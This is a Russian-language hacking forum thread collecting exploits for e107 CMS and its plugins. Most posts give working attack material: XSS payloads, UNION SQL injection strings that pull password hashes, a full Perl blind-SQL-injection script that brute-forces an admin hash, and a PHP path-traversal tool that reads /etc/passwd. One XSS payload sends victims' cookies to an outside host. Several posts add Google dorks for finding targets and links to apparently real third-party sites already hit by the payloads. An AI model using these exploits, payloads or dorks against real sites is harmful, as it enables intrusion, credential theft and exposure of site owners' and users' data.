[ Обзор уязвимостей e107 cms ]

Discussion in 'Веб-уязвимости' started by Nightmarе, 16 Aug 2007.

  1. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    862
    Likes Received:
    616
    Reputations:
    211
    e107 roll_mini v1.2 (каталог терминов) XSS
    http://e107.org.ru/download.php?view.221

    Уязвимый продукт: roll_mini (каталог терминов)
    Версия: v1.2
    Условия: magic quotes off

    1. XSS
    Уязвимость в файле roll.php
    Уязвимый кусок кода:
    PHP:
    if ($_GET['cat']) $id_cat $_GET['cat']; else $id_cat "1";
    if (
    $_GET['search']) $search $_GET['search'];
    .........
    <
    input class='tbox' type='hidden' name='cat' size='30' value='".$id_cat."' >
    <
    input class='tbox' type='text' name='search' size='30' value='".$search."' >
    xss атаку можна произвести из за отсуствия фильтации в файле roll.php

    Exploit:
     
  2. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    862
    Likes Received:
    616
    Reputations:
    211
    coppermine_menu (фотогаллерея) Blind sqlInj
    http://web.wilan.com.ru/modules.php?name=Files&go=view_file&lid=115

    Уязвимый продукт: coppermine_menu (фотогаллерея)
    Версия: v0.3.3

    Blind sqlInj
    Уязвимость в файле util.php
    Уязвимый кусок кода:
    PHP:
    $action $_POST['action'];
    ....
    function 
    filenametotitle($delete)
    {
        
    $albumid $_POST['albumid'];
        
    $parsemode $_POST['parsemode'];
        ....
        
    $query "SELECT * FROM $picturetbl WHERE aid = '$albumid'";
        
    $result MYSQL_QUERY($query);
        
    $num mysql_numrows($result);
    }
    ......
    } else if (
    $action == 'title') { ....
    filenametotitle(0); ..}
    ........
    sqlInj атаку можна произвести из за отсуствия фильтации в POST запросе данних action, albumid

    Exploit:
     
  3. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    862
    Likes Received:
    616
    Reputations:
    211
    EasyShop adminXSS
    http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.461

    Уязвимый продукт: EasyShop
    Условия: нужни права админа(єсли использовать СИ, то можно заставить админа отправить тебе свои куки..))

    XSS
    Уязвимость в файле admin_main_categories_edit.php
    Уязвимый кусок кода:
    PHP:
    ..
    } else if (
    $_GET['delete_main_category'] == '1') {
    <
    a href='admin_main_categories_edit.php?delete_main_category=2&main_category_id=".$_GET['main_category_id']."'>".
    ...
    задействовать только в совместимости с СИ

    Exploit:
     
  4. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Full path disclosure --last upd

    Code:
    /online.php
    /e107_plugins/log/consolidate.php
    /e107_plugins/log/log.php
    /e107_plugins/pdf/e107pdf.php
    
     
    1 person likes this.
  5. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Version disclosure --last upd
    Code:
    /e107_admin/credits.php
    /e107_docs/README.html
    /e107_docs/README_UPGRADE.html
    /e107_files/e107.js
    /e107_files/shortcode/sitelinks_alt.sc
    /e107_handlers/tiny_mce/plugins/ibrowser/editor_plugin.js
     
    1 person likes this.
  6. fire64

    fire64 Elder - Старейшина

    Joined:
    1 Apr 2008
    Messages:
    252
    Likes Received:
    22
    Reputations:
    5
    xss в плагине форума, в версии v.0.7.15

    заголовок темы не фильтруется

    Code:
    ><script>alert(1)</script><
    
     
  7. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    412
    Reputations:
    256
    e107 Plugin userjournals_menu

    Code:
    ###################################################################
    e107 Plugin userjournals_menu (blog.id) SQL injection vulnerability 
    ###################################################################
    
    
    ###################################################
    #[~] Author        :  boom3rang 
    #[~] Greetz        :  H!tm@N, KHG, chs, redc00de
    #[~] Vulnerability :  Remote SQL-injection
    #[~] Google Dork   :  inurl:"userjournals.php?blog."
    --------------------------------------------------   
    #[!] Product Site  :  http://www.bugrain.com
    #[!] Download CMS  :  http://www.e107coders.org/download.php?view.1402
    #[!] Version       :  v0.7 or later
    ###################################################
    
    
    [-] POC:
    http://localhost/plugins/userjournals_menu/userjournals.php?blog.[exploit]
    
    [-] Exploit:
    -9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
    
    [-] Exploit 2:
    -9999 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
    
    [+] LiveDemo:
    http://demo.infozonelab.com/plugins/userjournals_menu/userjournals.php?blog.-9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
    
    
    ###########################
    United States of Albania
    Proud to be Albanian
    R.I.P redc00de
    ###########################
    © milw0rm.com [2009-04-13]
     
    1 person likes this.
  8. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit

    Code:
    #!/usr/bin/env perl
    #
    # e107 <= 0.7.15 "extended_user_fields" Blind SQL Injection Exploit
    #
    # Description
    # -------------------------------------------------------------------
    # e107 contains one flaw that allows an attacker to carry out an SQL
    # injection attack. The issue is due to the "usersettings.php" script 
    # not properly saniting user-supplied input to the hide[] key. 
    # This may allow an attacker to inject or manipulate sql queries in
    # the backend database if magic_quotes_gpc = off.
    # -------------------------------------------------------------------
    # Code Details (usersettings.php) 
    # -------------------------------------------------------------------
    # Line 433 - 441 
    #
    # if($ue_fields) {
    #    $hidden_fields = implode("^", array_keys($_POST['hide'])); <------ {1}
    #     
    #     if($hidden_fields != "")
    #     {
    #	 $hidden_fields = "^".$hidden_fields."^";  
    #     }
    #     $ue_fields .= ", user_hidden_fields = '".$hidden_fields."'"; <---- {2}
    #   }
    #
    # Line 470 - 476
    #  
    #  if($ue_fields) 
    #  {
    #    [etc..]
    #    $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'");
    #  }  
    #  
    # ue[] POST variable needs a valid key
    # such as "aim","msn" or other user_extended_fields
    # (@fields array). 
    #
    # Fix this sql injection using (php function)
    # mysql_real_escape_string to the POST 'hide' key,
    # otherwise find a way to fix it. dont care
    # ------------------------------------------
    # Discovered & Written 
    # by Juri Gianni aka yeat - staker[at]hotmail[dot]it
    #  
    # Thanks to
    # ---------------------------------------------
    # JosS,girex,str0ke,certaindeath,plucky
    # #zeroidentity chan - http://zeroidentity.org
    # ---------------------------------------------
    # http://www.youtube.com/watch?v=0rgInHvW8Ic
    # http://www.youtube.com/watch?v=O2y62xcUJ8E
    # ---------------------------------------------
    
    use LWP::UserAgent;
    
    
    my $prefix = "e107_"; # default table_prefix
    my $type_i = undef;
    my $sock_u = new LWP::UserAgent;
    
    my ($domain,$user_name,$user_pwd,$target) = @ARGV;
    
    
    e107::Usage() unless scalar (@ARGV) > 3; 
      
    e107::Login($user_name,$user_pwd);
    $type_i = e107::ExtendedField();
    e107::Exploit();
        
    
    sub e107::Usage
    {
           print "e107 <= 0.7.15 'extended_user_fields' Blind SQL Injection Exploit\n";
           print "Usage: perl xpl.pl http://[host]/[path] [username] [password] [target id]\n";
           print "Usage: perl xpl.pl http://localhost/e107 yeat an4rchy 1\n";
           exit;
    }       
    
    sub e107::Exploit
    {
         e107::Vulnerable();
         e107::BruteForce(); 
    }
    
    
    
    sub e107::SqlQuery
    {
           my ($do_query,$response,$start,$down,$element);
           
           $do_query = $_[0] || die $!;
           
           $start = time();
      
           $response = $sock_u->post($domain.'/usersettings.php',
                                   [
                                     "email"           => 'doesnt@exists.net',
                                     "ue[user_$type_i]" => 1,
                                     "hide[$do_query]" => 1,
                                     "updatesettings"  => 'Save Settings',
                                  ]) or die $!;
           $down = time();
           
           return $down - $start;                            
    }
    
    
    
    sub e107::CheckField
    {
           my ($do_query,$response,$start,$down,$element);
           
           $do_query = $_[0];
           $element  = $_[1] || die $!;  
           
           
           $start = time();
      
           $response = $sock_u->post($domain.'/usersettings.php',
                                   [
                                     "email"           => 'doesnt@exists.net',
                                     "ue[user_$element]" => 1,
                                     "hide[$do_query]" => 1,
                                     "updatesettings"  => 'Save Settings',
                                  ]) or die $!;
           $down = time();
           
           return $down - $start;                            
    }
          
          
    
    sub e107::ExtendedField
    {
           my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');
           
           my $query = "\x27/**/OR/**/CASE/**/WHEN(1>0)/**/THEN".
                       "/**/benchmark(100000000,CHAR(0))/**/END#";
                       
           for (my $i=1;$i<8;$i++) {
                 
                 if (e107::CheckField($query,$fields[$i]) > 6) {
                    return $fields[$i]; last;
                 }     
                 unless ($i != 8 && $fields[$i]) {
                   die("Site not vulnerable..\n");
                 }
           }          
    } 
            
            
    
    sub e107::SqlBrute
    {
           my $ascii = $_[0];
           my $limit = $_[1] || 1;
           
           my $sql_query = "\x27/**/OR/**/(SELECT/**/IF((ASCII(SUBSTRING(user_password,$limit,1))".
                           "=$ascii),benchmark(200000000,CHAR(0)),0)/**/FROM/**/${prefix}user/**/".
                           "WHERE/**/user_id=$target)#";
           
           return $sql_query;                
    }
    
    
    
    sub e107::BruteForce
    {
           my $i = 1;
           my @charset = (97..102,48..57);
           my $convert = undef;
           my $result  = undef;
           
           
           for ($i..32) {
                 
                 foreach $convert (@charset) {
                       
                       if (e107::SqlQuery(e107::SqlBrute($convert,$i)) > 9) {
                          syswrite(STDOUT,chr($convert)); $i++;
                          last; $result .= chr($convert);
                       }              
                 }
           }
           
           unless (length($result) != 32) {
              print "\nHash MD5: $result\n";
              print "User ID: $target\n";
           }
    }
    
    
    
    sub e107::Vulnerable
    {             
           my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');
           
           for (my $i=1;$i<8;$i++) {
           
                if ($fields[$i] eq $type_i) {
                   print "Exploiting..\n"; last;
                }
                else {
                   die ("Site not vulnerable..\n");
                }
           }             
    }       
        
                             
    
    sub e107::Login
    {
            my ($username,$password) = @_;
            my ($result,$response);
            
            $response =  $sock_u->post($domain.'/signup.php',
                                     [
                                       username  => $username,
                                       userpass  => $password,
                                       userlogin => 'Login',
                                       autologin => 0
                                     ]) or die $!;
            
            $result = $response->as_string;                         
                                     
            if ($result =~ /e107cookie=(\d+)\.([0-9a-f]{32})/i) {
                 $sock_u->default_header('Cookie' => "e107cookie=$1.$2;"); 
                 $sock_u->agent('Lynx (textmode) - Logged');
            }
            else {
               die("Login failed..\n");
            }   
    }
    
    # milw0rm.com [2009-04-20]
     
  9. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    ZoGo-Shop e107 plugin

    Vuln File:
    product_details.php

    Vuln Code:
    Code:
    e107_plugins/zogo-shop/product_details.php
    $product_ID=$_GET["product"];
    Exploit:
    Code:
    http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL]
     
    1 person likes this.
  10. Psi.X

    Psi.X New Member

    Joined:
    12 Apr 2009
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Есть такая штука...
    В файле e107_admin/auth.php
    PHP:
        function authcheck($authname$authpass)
        {
            
    /*
            # Admin auth check
            # - parameter #1:                string $authname, entered name
            # - parameter #2:                string $authpass, entered pass
            # - return                                boolean if fail, else result array
            # - scope                                        public
            */
            
    global $tp;
            
    $sql_auth = new db;
            
    $authname $tp -> toDB(preg_replace("/\sOR\s|\=|\#/"""$authname));
            if (
    $sql_auth->db_Select("user""*"""))//"user_loginname='$authname' OR 1=1"))// AND user_admin='1' "))
    Логин приходит в базу через $tp -> toDB() но НЕ ФИЛЬТРУЕТСЯ !
    Можно дописать после нее echo $authname, и мы увидим резалт.
    Но у меня на локалхосте так и не получилось что-либо сделать. Выходит какаето ерунда...
    Запрос вроде есть мускл возвр хендл, но когда идет проверка на кол-во строк возвр 0
    Хоть убей не понимаю в чем дело...
     
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Ну как же не фильтруется, когда напротив очень даже фильтруется.
    Смотрим e107_handlers/e_parse_class.php

    Дабы избежать того, на что наткнулся ты, я поставлю /*1*/ в те участки кода, которые браузер воспринимает не так как они есть на самом деле:

    Code:
    	function toDB($data, $nostrip = false, $no_encode = false, $mod = false)
    	{
    		global $pref;
    		if (is_array($data)) {
    			// recursively run toDB (for arrays)
    			foreach ($data as $key => $var) {
    				$ret[$key] = $this -> toDB($var, $nostrip, $no_encode, $mod);
    			}
    		} else {
    			if (MAGIC_QUOTES_GPC == TRUE && $nostrip == false) {
    				$data = stripslashes($data);
    			}
    			if(isset($pref['post_html']) && check_class($pref['post_html']))
    			{
    				$no_encode = TRUE;
    			}
    			if ($no_encode === TRUE && $mod != 'no_html')
    			{
    				$search = array('$', '"', "'", '\\', '<?');
    				$replace = array('&#[COLOR=DarkOrange]/*1*/[/COLOR]036;','&q[COLOR=DarkOrange]/*1*/[/COLOR]uot;','&#[COLOR=DarkOrange]/*1*/[/COLOR]039;', '&#0[COLOR=DarkOrange]/*1*/[/COLOR]92;', '&[COLOR=DarkOrange]/*1*/[/COLOR]lt;?');
    				$ret = str_replace($search, $replace, $data);
    			} else {
    				$data = htmlspecialchars($data, ENT_QUOTES, CHARSET);
    				$data = str_replace('\\', '\', $data);
    				$ret = preg_replace("/&amp;#(\d*?);/", "&#\\1;", $data);
    			}
    			//If user is not allowed to use [php] change to entities
    			if(!check_class($pref['php_bbcode']))
    			{
    				$ret = preg_replace("#\[(php)#i", "[\\1", $ret);
    			}
    
    		}
    
    		return $ret;
    	}
    Если чуть короче, то вот замена, которая нам нужна:

    ' -> &#/*1*/039;

    Что делает браузер? отображает &#/*1*/039; как привычную кавычку.
    Что делаешь ты? дописываешь в код echo($authname);
    И видишь, то, что хочешь увидеть - кавычку, а вот если заглянуть в сорец странички (html (Вид - Исходный код страницы)), то можно увидеть что кавычки там нету, а есть &#/*1*/039;
     
  12. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    Уязвимость существует из-за недостаточной обработки входных данных параметра "email" в POST запросе сценария guestbook.php.
    Уязвимое поле "E-mail". Сформированные Post data заголовок:
    Code:
    POSTDATA=name=E107 CMS (e107_plugins/guestbook) stored XSS by ettee(itdefence.ru)&email='><script>alert('xss')</script>
    Example: http://target/e107_plugins/guestbook/guestbook.php?edit.2. Где "2" является номером вашего сообщения.
    Google dork: inurl:/e107_plugins/guestbook/guestbook.php
    Cookie: '><script>img = new Image(); img.src = "http://someshit.net/image/s.gif?"+document.cookie;</script>
     
    _________________________
    1 person likes this.
  13. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    e107 Plugin my_gallery 2.4.1 Exploit

    e107 Plugin my_gallery 2.4.1 Exploit


    Class: Input Validation Error
    Remote: Yes
    Vulnerable: e107.org my_gallery 2.4.1
    e107.org my_gallery 2.3
    e107.org my_gallery 0

    Code:
    <?php
    
    /*
    
    ============================================
    [o] e107 Plugin my_gallery 2.4.1 Exploit [o]
    ============================================
    
    Bug [f]ound by NoGe - noge.code@gmail.com
    Exploit [c]oded by Vrs-hCk - d00r@telkom.net
    
    * Plugin my_gallery create photo gallery.
    * Powered by Highslide JS script.
    * With random gallery menu and navigation menu.
    * Has a comment system, ratings and search of images.
    
    Download e107 my_gallery 2.4.1 Plugin
    http://code.google.com/p/e107mygalleryplugin/downloads/list
    
    
    =============
    [o] Usage [o]
    =============
    
    Web 2 XPL << fill with site who use e107 Plugin my_gallery
    File 2 Read << fill with file or directory you want to read
    
    Web 2 XPL : www.contoh.com
    File 2 Read : /etc/passwd
    
    Then Go!!!
    
    
    ==============
    [o] Greetz [o]
    ==============
    
    MainHack BrotherHood [ http://news.serverisdown.org ]
    Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
    H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
    skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
    
    FUCK TERORIS!!
    
    */
    
    $vuln  = '/e107_plugins/my_gallery/image.php?file=';
    $trasv = '/../../../../../../../../../../../../../../..';
    
    echo "<form method=POST>
    Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
    File 2 Read : <input type=\"text\" name=\"file\" size=30>
    <input type=submit value=\"Go!!!\" name=\"_xpl\">
    <br><br>";
    
    if ($_POST['_xpl']) {
    	$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
    	$data .= "Host: {$host}\r\n";
    	$data .= "Connection: close\r\n\r\n";
    	$html  = sendpacket($host,$data);
    	print '<pre>'.htmlspecialchars($html).'</pre>';
    }
    
    echo "</form>";
    
    function sendpacket($host,$data) {
    	if (!$sock = @fsockopen($host,80)) {
    		die("[!] Connection refused, try again!\n");
    	}
    	fputs($sock,$data);
    	while (!feof($sock)) { $html .= fgets($sock); }
    	fclose($sock);
    	return $html;
    }
    
    ?>
    
    # milw0rm.com [2009-07-23]
     
    1 person likes this.
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    1.image.php?file='; это в файле image постом выше


    2.Читалка файлов

    Файл dload.php

    PHP:
    <?php
    $file 
    $_GET['file'];
    $date_txt date("y-m-d_H-i-s");
    $text "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
    header('Content-type: image/jpeg');
    header($text);
    readfile($file);
    ?>
    все тоже самое тока в еще одном файле

    Пример : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd


    там он вам даст сохранить картинку, сохраняем, открываем в блокноте и видим след строчки

    Code:
    <br />
    <b>Warning</b>:  readfile(\') [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/home/verrechi/public_html/e107_plugins/my_gallery/dload.php</b> on line <b>7</b><br />
    
    *conf DB

    http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
     
    _________________________
    #34 HAXTA4OK, 26 Aug 2009
    Last edited: 26 Aug 2009
    4 people like this.
  15. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    На самом деле експлоит написан был раньше http://milw0rm.com/exploits/5308
     
  16. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    e107(e107_v0.7.16_standart_RUS)


    active XSS in comment's news
    Code:
    ......./path/comment.php?comment.news.[id]
    Submit comment
    Subject: <script>alert(//)</script>
    Comment:<script>alert(//)</script>

    куки имеют вид:
    1.1a1dc91c907325c69271ddf0c944bc72
    id.md5(pass)


    при инстале префикс таблиц не фильтруется
    Code:
    mysql_query("INSERT INTO {$this->previous_steps['mysql']['prefix']}core VALUES ('SitePrefs_Backup', '{$tmp}')");
     
    2 people like this.
  17. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    SQL injection in e107 cms
    Version = v0.7 or later
    SQL
    http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]

    1:
    Code:
    -1 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
    2:
    Code:
    -1 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
    bug site:
    http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@version,8,9,0,11,12,13--
     
    5 people like this.
  18. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    Межсайтовый скриптинг e107 ветки 0.x

    Code:
    Referer: "><script>alert(document.cookie)</script>
    (c)
     
  19. sir95

    sir95 New Member

    Joined:
    30 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Оно не загружает, оно просто показывает изображение ;) , пробывал но ничего не получилось.

    Поскажите какие есть уязвимости на 0.7.11 , очень надо.
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    e107_plugins

    Расскрытие путей
    При простом переходе на файл e107_plugins/e107shop/features.php

    пример :
    PHP:
    http://northfloridahomebuilder.com/e107_plugins/e107shop/features.php
     
    _________________________
    3 people like this.
Loading...